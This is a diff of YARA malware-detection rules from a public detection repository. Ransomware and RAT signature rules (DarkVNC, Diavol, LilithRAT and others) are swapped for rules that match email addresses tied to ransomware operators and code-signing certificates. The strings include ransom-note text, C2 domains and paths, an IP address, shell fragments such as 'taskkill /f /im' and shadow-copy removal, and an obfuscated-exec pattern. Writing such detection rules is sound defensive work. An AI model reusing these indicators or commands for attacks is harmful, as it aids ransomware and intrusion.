-		$url2 = "http://hiveleakdb" ascii
-		$s1 = "encrypt_files.go" ascii
-		$s2 = "erase_key.go" ascii
-		$s3 = "kill_processes.go" ascii
-		$s4 = "remove_shadow_copies.go" ascii
-		$s5 = "stop_services_windows.go" ascii
-		$s6 = "remove_itself_windows.go" ascii
-		$x1 = "/encryptor/" ascii
-		$x2 = "HOW_TO_DECRYPT.txt" ascii
-		$x3 = "FilesEncrypted" fullword ascii
-		$x4 = "EncryptionStarted" fullword ascii
-		$x5 = "encryptFilesGroup" fullword ascii
-		$x6 = "Your data will be undecryptable" ascii
-		$x7 = "- Do not fool yourself. Encryption has perfect secrecy" ascii
-		$v1_1 = ".EncryptFiles." ascii
-		$v1_2 = ".EncryptFilename." ascii
-		$v1_3 = ")*struct { F uintptr; .autotmp_14 string }" ascii
-		$v1_4 = "D*struct { F uintptr; data *[]uint8; seed *uint8; fnc *main.decFunc }" ascii
-		$v1_5 = "golang.org/x/sys/windows.getSystemWindowsDirectory" ascii
-		$v1_6 = "path/filepath.WalkDir" ascii
-		$v2_1 = "taskkill /f /im" ascii
-		$v2_2 = "schtasks /delete /tn" ascii
-		$v2_3 = "encfile.txt" ascii
-		$v2_4 = "README.html" ascii
-		$v2_5 = "total encrypt %v/%v" ascii
-		$v2_6 = "<b>ITSSHOWKEY</b>" ascii
-		$v2_7 = "Recovery your files." ascii
-		$v2_8 = "yaml:\"send_host\"" ascii
-		$v2_9 = "yaml:\"ignore_dir\"" ascii
+		$s1 = "exec(lzma.decompress(base64.b64decode("
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $url* ) or all of ( $s* ) or 4 of ( $x* ) or 5 of ( $v1* ) or 5 of ( $v2* ) or ( 4 of ( $v2* ) and #v2_1 > 10 ) )
+		( uint32( 0 ) == 0x6f706d69 or uint16( 0 ) == 0x2123 or uint16( 0 ) == 0x0a0d or uint16( 0 ) == 0x5a4d ) and all of them
 }
-rule DITEKSHEN_MALWARE_Win_Spyro : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Bazarloader : FILE
 {
 	meta:
-		description = "Detects Spyro / VoidCrypt / Limbozar ransomware"
-		author = "ditekSHen"
-		id = "8b3273c4-827e-50ce-983e-a5843f6b5a78"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects Bazar executables with specific email addresses found in the code signing certificate"
+		author = "ditekShen"
+		id = "94b814e3-56c2-5cdb-9335-c92eea8ec668"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6649-L6675"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L11-L21"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2e3be361f6d4283fd312a4486eaa39d6594813937cc3f62dbb603babeff17929"
+		logic_hash = "fd47a1d996c78a6efc144f0fe0a28951c34becab3101e7d25acc980bb6b9f8ce"
 		score = 75
-		quality = 75
+		quality = 71
 		tags = "FILE"
 
 	strings:
-		$s1 = "Decrypt-info.txt" ascii wide
-		$s2 = "AbolHidden" ascii wide
-		$s3 = "C:\\ProgramData\\prvkey" ascii wide
-		$s4 = ".?AV?$TF_CryptoSystemBase@VPK_Encryptor@CryptoPP" ascii
-		$s5 = "C:\\Users\\LEGION\\" ascii
-		$s6 = "C:\\ProgramData\\pkey.txt" fullword ascii
-		$s7 = ".Spyro" fullword ascii
-		$m1 = "Go to C:\\ProgramData\\ or in Your other Drives" wide
-		$m2 = "saving prvkey.txt.key file will cause" wide
-		$m3 = "in Case of no Answer:" wide
-		$m4 = "send us prvkey*.txt.key" wide
-		$m5 = "Somerhing went wrong while writing payload on disk" ascii
-		$m6 = "this country is forbidden.\"}" ascii
-		$c1 = "Voidcrypt/1.0" ascii
-		$c2 = "h1dd3n.cc" ascii
-		$c3 = "/voidcrypt/index.php" ascii
-		$c4 = "&user=" ascii
-		$c5 = "&disk-size=" ascii
-		$c6 = "unique-id=" ascii
+		$s1 = "skarabeyllc@gmail.com" ascii wide nocase
+		$s2 = "admin@intell-it.ru" ascii wide nocase
+		$s3 = "support@pro-kon.ru" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or 4 of ( $c* ) or 3 of ( $m* ) or 8 of them )
+		uint16( 0 ) == 0x5a4d and any of them
 }
-rule DITEKSHEN_MALWARE_Win_Darkvnc : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Qakbot : FILE
 {
 	meta:
-		description = "Detects DarkVNC"
-		author = "ditekSHen"
-		id = "3c7d215c-fcca-5a0f-b59c-d84fd894677a"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects QakBot executables with specific email addresses found in the code signing certificate"
+		author = "ditekShen"
+		id = "24ad36b2-5022-5f72-b01c-fbb64da20f34"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6677-L6696"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L23-L37"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b0dbde04c0a05e476d505b92cf7dbf3b4ef0dd9e88eafcd21b7a7d0e3623abbd"
+		logic_hash = "7a38069b3b553cba1a789dac706638382dae5bb748b0c10ef50138879767b6dd"
 		score = 75
-		quality = 75
+		quality = 61
 		tags = "FILE"
 
 	strings:
-		$s1 = "USR-%s(%s)_%S-%S%u%u" fullword wide
-		$s2 = "BOT-%s(%s)_%S-%S%u%u" fullword wide
-		$s3 = "USR-UnicodeErr(Err)_%s-%s%u%u" fullword ascii
-		$s4 = "BOT-UnicodeErr(Err)_%s-%s%u%u" fullword ascii
-		$s5 = "PRM_STRG" fullword wide
-		$s6 = "bot_shell >" ascii
-		$s7 = "monitor_off / monitor_on" ascii
-		$s8 = "kbd_off / kbd_on" ascii
-		$s9 = "ActiveDll: Dll inject thread for process 0x%x terminated with status: %u" ascii
-		$s10 = "PsSup: File %s successfully started with parameter \"%s\"" ascii
-		$s11 = "PsSup: ShellExecute failed. File: %s, error %u" ascii
-		$s12 = "#hvnc" fullword ascii
+		$s1 = "hutter.s94@yahoo.com" ascii wide nocase
+		$s2 = "andrej.vrear@aol.com" ascii wide nocase
+		$s3 = "klaus.pedersen@aol.com" ascii wide nocase
+		$s4 = "a.spendl@aol.com" ascii wide nocase
+		$s5 = "mjemec@aol.com" ascii wide nocase
+		$s6 = "robert.sijanec@yahoo.com" ascii wide nocase
+		$s7 = "mitja.vidovi@aol.com" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and any of them
 }
-rule DITEKSHEN_MALWARE_Win_RSJON : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Amadey : FILE
 {
 	meta:
-		description = "Detects RSJON / Ryzerlo / HiddenTear ransomware"
-		author = "ditekSHen"
-		id = "7cc3e863-b594-51a9-9d41-68021ce3b97c"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects Amadey executables with specific email addresses found in the code signing certificate"
+		author = "ditekShen"
+		id = "f9abbf1d-2077-52a8-bfb0-df3732649624"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6698-L6727"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L39-L47"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "abfea2955bf0d0b0511ea820582cc15fbcfc38dbed71fb2a0050cd98a9311cda"
+		logic_hash = "3df3fe67835f76e51743b1b4fa2cbc48277d82689c2fc27457b4d7d820e56e43"
 		score = 75
-		quality = 23
+		quality = 73
 		tags = "FILE"
 
 	strings:
-		$pdb1 = "C:\\Users\\brknc\\source\\repos\\" ascii
-		$pdb2 = "\\rs-jon\\obj\\Debug\\rs-jon.pdb" ascii
-		$pdb3 = "\\rs-jon\\obj\\Release\\rs-jon.pdb" ascii
-		$x1 = "READ_ME_PLZ.txt" wide
-		$x2 = "Files has been encrypted with rs-jon" wide
-		$x3 = ".rsjon" wide
-		$x4 = "bitcoins or kebab" wide
-		$x5 = /rs[-_]jon/ fullword ascii wide
-		$s1 = "SPIF_UPDATEINIFILE" fullword ascii
-		$s2 = "SPI_SETDESKWALLPAPER" fullword ascii
-		$s3 = "bytesToBeEncrypted" fullword ascii
-		$s4 = "SendPassword" fullword ascii
-		$s5 = "EncryptFile" ascii
-		$s6 = "fWinIni" fullword ascii
-		$s7 = "BTCAdress" fullword ascii
-		$s8 = "self_destruck" fullword ascii
-		$c1 = "?computer_name=" wide
-		$c2 = "&serialnumber=" wide
-		$c3 = "&password=" wide
-		$c4 = "&allow=ransom" wide
-		$c5 = "://darkjon.tk/" wide
-		$c6 = "/rnsm/write.php" wide
+		$s1 = "tochka.director@gmail.com" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 3 of ( $x* ) or 6 of ( $s* ) or 4 of ( $c* ) or ( 2 of ( $c* ) and 4 of ( $s* ) ) or ( 1 of ( $pdb* ) and 1 of them ) )
+		uint16( 0 ) == 0x5a4d and any of them
 }
-rule DITEKSHEN_MALWARE_Win_Boxcaon : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_UNK01 : FILE
 {
 	meta:
-		description = "Detects IndigoZebra BoxCaon"
-		author = "ditekSHen"
-		id = "becbde73-8b72-5e98-8684-87068ffff71b"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects Amadey executables with specific email addresses found in the code signing certificate"
+		author = "ditekShen"
+		id = "56e83bfb-e17d-5d27-87fa-e275cc540148"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6729-L6746"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L49-L58"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4f2f26e6678d49bfa5937511b1788a059ee10e1b5f19e53d6386199738a925a5"
+		logic_hash = "d85461f74186fcabcbf7f2bc1dce06b0012c504cf3235a6fc3e1499dc6f8a3ee"
 		score = 75
-		quality = 50
+		quality = 73
 		tags = "FILE"
+		hash1 = "37d08a64868c35c5bae8f5155cc669486590951ea80dd9da61ec38defb89a146"
 
 	strings:
-		$s1 = "<RetCMD null>" fullword wide
-		$s2 = "<txt null>" fullword wide
-		$s3 = "C:\\Users\\Public\\%d\\" fullword wide
-		$s4 = "api.dropboxapi.com" fullword wide
-		$s5 = "/2/files/upload" fullword wide
-		$ts1 = "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko" ascii wide
-		$ts2 = "%s /A /C \"%s\" > %s" ascii wide
-		$ts3 = "ersInfo" ascii wide
-		$ts4 = "%svmpid%d.log" ascii wide
-		$ts5 = "%scscode%d.log" ascii wide
+		$s1 = "etienne@tetracerous.br" ascii wide nocase
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and all of ( $s* ) ) or all of ( $ts* )
+		uint16( 0 ) == 0x5a4d and any of them
 }
-rule DITEKSHEN_MALWARE_Win_Avoslocker : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Lockergoga
 {
 	meta:
-		description = "Hunt for AvosLocker ransomware"
-		author = "ditekSHen"
-		id = "390e57b2-207e-5013-899a-0b04aa63a56f"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects files referencing identities associated with LockerGoga ransomware"
+		author = "ditekShen"
+		id = "ff257dae-d09b-52b3-93ca-68a560231b0d"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6748-L6757"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L60-L80"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "85601fdd13ddeb1fc0b8b98eb68e324046d60c1ae9467d083a75abebcb50e3a0"
+		logic_hash = "f3474f92d935dda0d4c3b11b6934aede69ed949c8ba4d196bfe320476d39ac36"
 		score = 75
-		quality = 75
-		tags = "FILE"
+		quality = 49
+		tags = ""
 
 	strings:
-		$s1 = "GET_YOUR_FILES_BACK.txt" ascii wide
-		$s2 = ".avos" fullword ascii wide
+		$s1 = "abbschevis@protonmail.com" nocase ascii wide
+		$s2 = "aperywsqaroci@o2.pl" nocase ascii wide
+		$s3 = "asuxidoruraep1999@o2.pl" nocase ascii wide
+		$s4 = "dharmaparrack@protonmail.com" nocase ascii wide
+		$s5 = "ijuqodisunovib98@o2.pl" nocase ascii wide
+		$s6 = "mayarchenot@protonmail.com" nocase ascii wide
+		$s7 = "mikllimiteds@gmail.com0" nocase ascii wide
+		$s8 = "phanthavongsaneveyah@protonmail.com" nocase ascii wide
+		$s9 = "qicifomuejijika@o2.pl" nocase ascii wide
+		$s10 = "rezawyreedipi1998@o2.pl" nocase ascii wide
+		$s11 = "sayanwalsworth96@protonmail.com" nocase ascii wide
+		$s12 = "suzumcpherson@protonmail.com" nocase ascii wide
+		$s13 = "wyattpettigrew8922555@mail.com" nocase ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		any of them
 }
-rule DITEKSHEN_MALWARE_Win_Diavol : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Goldenaxe
 {
 	meta:
-		description = "Detects Diavol ransomware"
-		author = "ditekSHen"
-		id = "df5cea04-505e-5009-b247-ba71b6d81ecc"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects files referencing identities associated with GoldenAxe ransomware"
+		author = "ditekShen"
+		id = "cd6486eb-742f-50fb-bd99-c5d778886477"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6759-L6784"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L82-L91"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "bcc7a9dc2dcb12ded75af9d79ab0f46f0e69da9e9fe72539be6351306ed11c18"
+		logic_hash = "2540da85880dc08b51a2d096cefd8ed3cb14ccd171b71b434ccf26e7c5f1b54b"
 		score = 75
-		quality = 48
-		tags = "FILE"
+		quality = 71
+		tags = ""
 
 	strings:
-		$s1 = "README_FOR_DECRYPT.txt" ascii wide nocase
-		$s2 = ".lock64" fullword ascii wide
-		$s3 = "LockMainDIB" ascii wide
-		$s4 = "locker.divided" ascii wide
-		$s5 = "%tob_dic%/" wide
-		$s6 = "%cid_bot%" wide
-		$m1 = "GENBOTID" ascii wide
-		$m2 = "SHAPELISTS" ascii wide
-		$m3 = "REGISTER" ascii wide
-		$m4 = "FROMNET" ascii wide
-		$m5 = "SERVPROC" ascii wide
-		$m6 = "SMBFAST" ascii wide
-		$c1 = "/Bnyar8RsK04ug/" fullword ascii
-		$c2 = "/landing" fullword ascii
-		$c3 = "/wipe" fullword ascii
-		$c4 = "&ip_local1=111.111.111.111&ip_local2=222.222.222.222&ip_external=2.16.7.12" fullword ascii
-		$c5 = "&group=" fullword ascii
-		$c6 = "/BnpOnspQwtjCA/register" fullword ascii
+		$s1 = "xxback@keemail.me" nocase ascii wide
+		$s2 = "darkusmbackup@protonmail.com" nocase ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 4 of ( $s* ) or 5 of ( $m* ) or 4 of ( $c* ) or 7 of them )
+		any of them
 }
-rule DITEKSHEN_MALWARE_Win_Margulasrat : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Getcrypt
 {
 	meta:
-		description = "Detects MargulasRAT"
-		author = "ditekSHen"
-		id = "6efabf80-9194-542d-afd2-9bf9c8e26e55"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects files referencing identities associated with GetCrypt ransomware"
+		author = "ditekShen"
+		id = "b5e31968-e626-5fbb-8bfe-942b48737367"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6786-L6810"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L93-L106"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "dd5b94c947d97cdc34032f2cb84b4975a1e8f510638857fb6dbe553bcff7d16e"
+		logic_hash = "401f4e69235873adc271f8861912ec17daaa71a798c83df8cc3a9b88520708c9"
 		score = 75
-		quality = 75
-		tags = "FILE"
+		quality = 63
+		tags = ""
 
 	strings:
-		$pdb1 = "G:\\VP-S-Fin\\memory\\" ascii
-		$pdb2 = "G:\\VP-S-Fin\\Margulas\\" ascii
-		$pdb3 = "G:\\VP-S-Fin\\remote" ascii
-		$pdb4 = "G:\\VP-S-Fin\\" ascii
-		$s1 = "/C choice /C Y /N /D Y /T 1 & Del " fullword wide
-		$s2 = "strToHash" fullword ascii
-		$s3 = "\\socking" fullword wide
-		$s4 = "\\wininets" fullword wide
-		$s5 = "ClientSocket" fullword ascii
-		$s6 = "new Stream()" fullword wide
-		$s7 = "CipherText" fullword ascii
-		$s8 = "WriteAllBytes" fullword ascii
-		$s9 = { 00 50 72 6f 63 65 73 73 00 45 78 69 73 74 73 00}
-		$s10 = "pxR/THCwdLuruMmw8wB8xAUvbno1yPGBTOV9IoOkAp/n7+paQm74pkzlfSKDpAKfTOV9IoOkAp9M5X0ig6QCn0zlfSKDpAKfTOV9IoOkAp" wide
-		$c1 = "149.248.52.61" wide
-		$c2 = "://vpn.nic.in" wide
-		$c3 = "://www.mod.gov.in/dod/sites/default/files/" wide
+		$s1 = "getcrypt@cock.li" nocase ascii wide
+		$s2 = "cryptget@tutanota.com" nocase ascii wide
+		$s3 = "cryptget@tutanota.com" nocase ascii wide
+		$s4 = "offtitan@pm.me" nocase ascii wide
+		$s5 = "offtitan@cock.li" nocase ascii wide
+		$s6 = "un42@protonmail.com" nocase ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $pdb* ) and ( 1 of ( $c* ) or 3 of ( $s* ) ) ) or ( 1 of ( $c* ) and 3 of ( $s* ) ) or ( 6 of ( $s* ) ) )
+		any of them
 }
-rule DITEKSHEN_MALWARE_Win_Lilithrat : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Cryptomix
 {
 	meta:
-		description = "Detects LilithRAT"
-		author = "ditekSHen"
-		id = "87e56524-f557-5662-86bc-2b26e7c74aee"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects files referencing identities associated with CryptoMix ransomware"
+		author = "ditekShen"
+		id = "7e623d06-36e8-576d-b261-d562eccf549b"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6812-L6839"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L108-L123"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1e8ac8a329ff99318e12666ea1d90d21bb9b0dff656a5eb1ce741b940c99afd5"
+		logic_hash = "27b75a476229fc877c316f7a61d1ed647f5a67ac44a174d86c084063f039b20c"
 		score = 75
-		quality = 75
-		tags = "FILE"
-		hash1 = "132870a1ae6a0bdecaa52c03cfe97a47df8786f148fa8ca113ac2a8d59e3624a"
-		hash2 = "ab7b6e0b28995bdeea44f20c0aba47f95e1d6ba281af3541cd2c04dc6c2a3ad9"
-		hash3 = "b2eeb487046ba1d341fb964069b7e83027b60003334e04e41b467e35c3d2460f"
-		hash4 = "cebcda044c60b709ba4ee0fa9e1e7011a6ffc17285bcc0948d27f866ec8d8f20"
+		quality = 34
+		tags = ""
 
 	strings:
-		$pdb1 = "c:\\Users\\Groovi\\Documents\\Visual Studio 2008\\Projects\\TestDll\\" ascii
-		$pdb2 = "C:\\Users\\iceberg\\Downloads\\RAT-Server-master\\RAT-Server-master\\RAT\\Debug\\RAT.pdb" ascii
-		$pdb3 = "C:\\Users\\Samy\\Downloads\\Compressed\\Lilith-master\\Debug\\Lilith.pdb" ascii
-		$s1 = "log.txt" fullword ascii
-		$s2 = "keylog.txt" fullword ascii
-		$s3 = "File Listing Completed Successfully." fullword ascii
-		$s4 = "Download Execute" fullword ascii
-		$s5 = "File Downloaded and Executed Successfully." fullword ascii
-		$s6 = "C:\\WINDOWS\\system32\\cmd.exe" fullword ascii
-		$s7 = "CMD session closed" ascii
-		$s8 = "Restart requested: Restarting self" fullword ascii
-		$s9 = "Termination requested: Killing self" fullword ascii
-		$s10 = "Couldn't write to CMD: CMD not open" fullword ascii
-		$s11 = "keydump" fullword ascii
-		$s12 = "remoteControl" fullword ascii
-		$s13 = "packettype" fullword ascii
+		$s1 = "portstatrelea1982@protonmail.om" ascii wide nocase
+		$s2 = "unlock@eqaltech.su" ascii wide nocase
+		$s3 = "unlock@royalmail.su" ascii wide nocase
+		$s4 = "adexsin276@gmail.com" ascii wide nocase
+		$s5 = "nbactocepnyou@protonmail.com" ascii wide nocase
+		$s6 = "nunlock@eqaltech.su" ascii wide nocase
+		$s7 = "nsnlock@royalmail.su" ascii wide nocase
+		$s8 = "cersiacsofal@protonmail.com" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $pdb* ) or 6 of ( $s* ) or ( 1 of ( $pdb* ) and 4 of ( $s* ) ) )
+		any of them
 }
-rule DITEKSHEN_MALWARE_Win_Epicenterrat : FILE
-{
-	meta:
-		description = "Detects EpicenterRAT"
-		author = "ditekSHen"
-		id = "6abe6e94-d7f5-5f88-96a6-a8fad599ef6a"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Buran
+{
+	meta:
+		description = "Detects files referencing identities associated with Buran ransomware"
+		author = "ditekShen"
+		id = "63cdda3f-78ed-5ce5-a8e0-e0893f2c314e"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6841-L6863"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L125-L140"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e9086dff22e301f57c6a9bdb38fbed8e902d5b8ca20a5e5b3cda56db08d5582e"
+		logic_hash = "685126efa7f90ce296fc616bd8d5d89a5b4b9aba8b60601b29534de21a0d0015"
 		score = 75
-		quality = 75
-		tags = "FILE"
+		quality = 59
+		tags = ""
 
 	strings:
-		$pdb1 = "c:\\Users\\Zombie\\Desktop\\MutantNinja\\" ascii
-		$pdb2 = "\\Epicenter Client\\" ascii
-		$s1 = "PROCESS_LIST<%SEP%>" fullword wide
-		$s2 = "GETREADY_RECV_FILE<%SEP%>" fullword wide
-		$s3 = "DISPLAY<%SEP%>" wide
-		$s4 = "GETSCREEN<%SEP%>" fullword wide
-		$s5 = "dumpImageName" fullword ascii
-		$s6 = "dumpLoc" fullword ascii
-		$s7 = "EXPECT<%SEP%>filelist<%SEP%>" fullword wide
-		$s8 = "<%FSEP%>FOLDER<%FSEP%>-<%SEP%>" fullword wide
-		$s9 = "KILLPROC<%SEP%>" fullword wide
-		$s10 = "LAUNCHPROC<%SEP%>" fullword wide
-		$s11 = "cmd.exe /c start /b " fullword wide
-		$s12 = "savservice" fullword wide
-		$s13 = "getvrs" fullword ascii
+		$s1 = "recovery_server@protonmail.com" ascii wide nocase
+		$s2 = "recovery1server@cock.li" ascii wide nocase
+		$s3 = "polssh1@protonmail.com" ascii wide nocase
+		$s4 = "polssh@protonmail.com" ascii wide nocase
+		$s5 = "buransupport@exploit.im" ascii wide nocase
+		$s6 = "buransupport@xmpp.jp" ascii wide nocase
+		$s7 = "jacksteam2018@protonmail.com" ascii wide nocase
+		$s8 = "notesteam2018@tutanota.com" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $pdb* ) or 5 of ( $s* ) )
+		any of them
 }
-rule DITEKSHEN_MALWARE_Win_Lastconn : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Ransomwareexx
 {
 	meta:
-		description = "Detects LastConn"
-		author = "ditekSHen"
-		id = "18727c30-d84d-5ffa-acd4-2cc54e553604"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects files referencing identities associated with RansomwareEXX Linux ransomware"
+		author = "ditekShen"
+		id = "dfcff8cb-c50c-559e-b5b9-8c2cdac7a3dc"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6865-L6894"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L142-L150"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "94f5874353d0fb475595373c06a0de91603cad9b435d35dc00febf90608d6b5a"
+		logic_hash = "a83ada5d29c6d62a292c4b3a1379558cddcaf63d97dbdfc6afd27cc52f6f656d"
 		score = 75
-		quality = 75
-		tags = "FILE"
+		quality = 73
+		tags = ""
 
 	strings:
-		$s1 = "System.Net.Http.SysSR" fullword wide
-		$s2 = "System.Net.Http.WrSR" fullword wide
-		$s3 = "yyyy'-'MM'-'dd'T'HH':'mm':'ss.FFFFFFFK" fullword wide
-		$s4 = { 63 00 6f 00 6e 00 74 00 65 00 6e 00 74 00 0c 6e
-               00 6f 00 74 00 69 00 66 00 79 00 04 06 12 80 e8
-               05 00 00 12 80 e8 08 75 00 73 00 65 00 72 00 08
-               74 00 65 00 61 00 6d 00 06 61 00 70 00 70 00 0c
-               6e 00 6f 00 61 00 75 00 74 00 68 00 }
-		$s5 = { 68 00 69 00 64 00 64 00 65 00 6e 00 10 64 00 69
-               00 73 00 61 00 6c 00 6c 00 6f 00 77 00 0e 65 00
-               78 00 74 00 65 00 6e 00 64 00 73 00 04 69 00 64
-               00 16 75 00 6e 00 69 00 71 00 75 00 65 00 49 00
-               74 00 65 00 6d 00 73 }
-		$s6 = "<RunFileOnes>d__" ascii
-		$s7 = "<UploadFile>d__" ascii
-		$s8 = "<ChunkUpload>d__" ascii
-		$s9 = "<StartFolder>d__" ascii
-		$s10 = "<ReadFileAlw>d__" ascii
-		$s12 = "<WriteFileToD>d__" ascii
-		$s13 = "<ReadFile>d__" ascii
-		$s14 = "<GetUpload>d__" ascii
-		$s15 = "CDropbox.Api.DropboxRequestHandler+<RequestJsonStringWithRetry>d__" ascii
+		$s1 = "france.eigs@protonmail.com" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 12 of them
+		any of them
 }
-rule DITEKSHEN_MALWARE_Win_Crimsonrat : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Phobos
 {
 	meta:
-		description = "Detects CrimsonRAT"
-		author = "ditekSHen"
-		id = "54c9bbb2-9fa6-5c1f-9272-13255357ddbf"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects files referencing identities associated with Phobos ransomware"
+		author = "ditekShen"
+		id = "cee09220-4038-5190-b595-28f67c845588"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6896-L6920"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L152-L161"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
